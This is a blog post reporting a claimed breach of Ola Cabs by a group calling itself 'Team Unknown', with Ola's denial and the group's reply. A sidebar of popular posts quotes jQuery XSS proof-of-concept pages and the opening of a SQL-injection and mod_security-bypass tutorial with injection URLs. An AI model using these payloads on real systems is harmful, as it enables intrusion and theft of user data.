Ola Cabs Hacked…

A hacker group has announced on Reddit that they have hacked Ola Cabs database, and have access to critical information such as credit card details, transaction history and voucher codes (unused).

The hackers announced on Reddit, “Once we got to the database it was like winning a lottery. It had all the user details along with credit card transaction history and unused vouchers. The voucher codes are not even out yet..”

Although this unknown hacker group has assured everyone that they won’t be using or saving any credit card details and unused voucher codes, there exist immense apprehensions after this announcement of hacking.

Calling themselves ‘Team Unknown’, this hacker group has posted three screenshots of the data base which allegedly belongs to Ola Cabs:












As we can see in the first screenshot, hackers have access to email ids of various employees and users, phone numbers and named. In the second screenshot, the hacker has shown that he can access all major tables inside the database such as user preferences, user details and transaction history. The third screenshot depicts MySQL codes which can retrieve any information he or she wants from Ola database.

‘Team Unknown’ has claimed that they have contacted Ola Management about this hack, but as of now, they have received no notifications from them.

Lastly, their announcement said, “I am sure OLA might be having a security team of their own. Not that good it seems ;) “

Here is a statement from Ola cabs in regards to this.


 There has been no security lapse, whatsoever to any user data. The alleged hack seems to have been performed on a staging environment when exposed for one of our test runs. The staging environment is on a completely different network compared to our production environment, and only has dummy user values exclusively used for internal testing purposes. We confirm that there has been no attempt by the hackers to reach out to us in this regard. Security and privacy of customer data is paramount to us at Ola.

 Here is a statement from Team Unknown in regards to this.
We have read some news/posts regarding the OLA Hack and we've come across the statement released by OLA Officials which states that we didn't contact them about the vulnerability, a claim that has no grounds. We did send them a mail and got no response from their side. We've already shared the screenshot of the mail. 








TeamUnknown just wants to ensure that the company which is dealing with critical information about the users like credit cards, personal info, should be secure enough even if its their development server. We already stated that we didn't store and use any of the critical information which may harm the company and their users.

Regards, Team Unknown

Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more